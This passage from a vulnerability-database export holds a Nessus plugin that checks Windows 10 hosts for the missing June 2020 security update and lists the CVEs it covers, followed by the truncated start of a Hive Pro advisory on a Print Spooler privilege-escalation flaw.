\"CVE-2020-1278\",\n \"CVE-2020-1279\",\n \"CVE-2020-1280\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1283\",\n \"CVE-2020-1286\",\n \"CVE-2020-1287\",\n \"CVE-2020-1290\",\n \"CVE-2020-1291\",\n \"CVE-2020-1292\",\n \"CVE-2020-1293\",\n \"CVE-2020-1296\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1304\",\n \"CVE-2020-1305\",\n \"CVE-2020-1306\",\n \"CVE-2020-1307\",\n \"CVE-2020-1309\",\n \"CVE-2020-1310\",\n \"CVE-2020-1311\",\n \"CVE-2020-1312\",\n \"CVE-2020-1313\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1316\",\n \"CVE-2020-1317\",\n \"CVE-2020-1324\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\",\n \"CVE-2020-1441\"\n );\n script_xref(name:\"MSKB\", value:\"4560960\");\n script_xref(name:\"MSFT\", value:\"MS20-4560960\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0256-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0300-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0051\");\n\n script_name(english:\"KB4560960: Windows 10 Version 1903 and Windows 10 Version 1909 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4560960. It is, \ntherefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. 
An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1273, CVE-2020-1274, CVE-2020-1275,\n CVE-2020-1276, CVE-2020-1307, CVE-2020-1316)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A vulnerability exists in the way the Windows\n Diagnostics & feedback settings app handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could cause additional diagnostic data\n from the affected device to be sent to Microsoft.\n (CVE-2020-1296)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. 
An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. 
(CVE-2020-1238,\n CVE-2020-1239)\n\n - An information disclosure vulnerability exists in the\n way that the Microsoft Server Message Block 3.1.1\n (SMBv3) protocol handles certain requests. An attacker\n who successfully exploited the vulnerability could\n obtain information to further compromise the users\n system. (CVE-2020-1206)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when\n Windows Mobile Device Management (MDM) Diagnostics\n improperly handles junctions. An attacker who\n successfully exploited this vulnerability could bypass\n access restrictions to delete files. (CVE-2020-1204)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Now Playing Session Manager handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1201)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. 
(CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Bluetooth Service handles objects\n in memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1280)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1248)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. 
An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could read memory that was freed and might run arbitrary\n code in an elevated context. An attacker could exploit\n this vulnerability by running a specially crafted\n application on the victim system. The update addresses\n the vulnerability by correcting the way the Windows\n Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when a\n Windows service improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1268)\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Orchestrator Service improperly handles\n file operations. An attacker who successfully exploited\n this vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. 
The update addresses the vulnerability by\n correcting the way the Windows Update Orchestrator\n Service handles file operations. (CVE-2020-1313)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability\n exists in Windows Security Health Service when handling\n certain objects in memory. (CVE-2020-1162,\n CVE-2020-1324)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. 
(CVE-2020-1290)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - A denial of service vulnerability exists when Connected\n User Experiences and Telemetry Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could cause a system to\n stop responding. (CVE-2020-1120, CVE-2020-1244)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. 
There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1238,\n CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the\n Windows Feedback Hub improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1199)\n\n - An information disclosure vulnerability exists in the\n way that the Microsoft Server Message Block 3.1.1\n (SMBv3) protocol handles certain requests. An attacker\n who successfully exploited the vulnerability could\n obtain information to further compromise the users\n system. (CVE-2020-1206)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when\n Windows Mobile Device Management (MDM) Diagnostics\n improperly handles junctions. An attacker who\n successfully exploited this vulnerability could bypass\n access restrictions to delete files. (CVE-2020-1204)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Now Playing Session Manager handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1201)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. 
(CVE-2020-1271)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Bluetooth Service handles objects\n in memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1280)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. 
An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1248)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could read memory that was freed and might run arbitrary\n code in an elevated context. An attacker could exploit\n this vulnerability by running a specially crafted\n application on the victim system. The update addresses\n the vulnerability by correcting the way the Windows\n Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - An information disclosure vulnerability exists when a\n Windows service improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. 
(CVE-2020-1268)\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Orchestrator Service improperly handles\n file operations. An attacker who successfully exploited\n this vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Update Orchestrator\n Service handles file operations. (CVE-2020-1313)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability\n exists in Windows Security Health Service when handling\n certain objects in memory. (CVE-2020-1162,\n CVE-2020-1324)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235,\n CVE-2020-1282, CVE-2020-1304, CVE-2020-1306,\n CVE-2020-1334)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. 
(CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. 
The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network List Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1209)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1277,\n CVE-2020-1302, CVE-2020-1312)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2020-1242)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. The security update addresses the\n vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. 
(CVE-2020-1279)\n\n - An elevation of privilege vulnerability exists in\n OpenSSH for Windows when it does not properly restrict\n access to configuration settings. An attacker who\n successfully exploited this vulnerability could replace\n the shell with a malicious binary. (CVE-2020-1292)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. 
(CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - A denial of service vulnerability exists in the way that\n the Microsoft Server Message Block 3.1.1 (SMBv3)\n protocol handles certain requests. An authenticated\n attacker who successfully exploited this vulnerability\n against an SMB Server could cause the affected system to\n crash. An unauthenticated attacker could also exploit\n this vulnerability against an SMB client and cause\n the affected system to crash. (CVE-2020-1284)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when the Microsoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. 
An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. 
An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1258)\");\n # https://support.microsoft.com/en-us/help/4557957/windows-10-update-kb4557957\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e4706967\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4557957.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1307\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1317\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Windows Update Orchestrator unchecked ScheduleWork call');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-06\";\nkbs = make_list('4557957');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"19041\",\n rollup_date:\"06_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4557957])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "hivepro": [{"lastseen": "2021-08-23T15:19:10", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here](<https://www.hivepro.com/wp-content/uploads/2021/07/TA202126.pdf>)[.](<https://www.hivepro.com/wp-content/uploads/2021/07/TA202122.pdf>)\n\nAfter almost 10 days of releasing [an advisory 
](<https://www.hivepro.com/emergency-patches-have-been-released-by-microsoft-for-printnightmare/>) by the Hive Pro Threat Research team, a new vulnerability has been found in Windows Print Spooler. This is a privilege escalation flaw that allows attackers to run arbitrary code with SYSTEM privileges, giving them the ability to install programs, read, alter, or remove data, and create new accounts with full user rights. The affected versions are not yet known. There have been no patches released yet, but workarounds are available.\n\n#### Vulnerability Details\n\n**CVE ID** | **Affected CPEs** | **Vulnerability Name** \n---|---|--- \nCVE-2021-34481 | cpe:2.3:o:microsoft:windows:*:*:*:*:*:*:*:* | Microsoft Windows Print Spooler Service Privilege Escalation \n \n#### Patch Links\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34481>\n\n#### References\n\n<https://threatpost.com/microsoft-unpatched-bug-windows-print-spooler/167855/>\n\n<https://arstechnica.com/gadgets/2021/07/disable-the-windows-print-spooler-to-prevent-hacks-microsoft-tells-customers/>", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-18T13:12:53", "type": "hivepro", "title": "Weren\u2019t you warned about reactivating the Print Spooler?", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": 
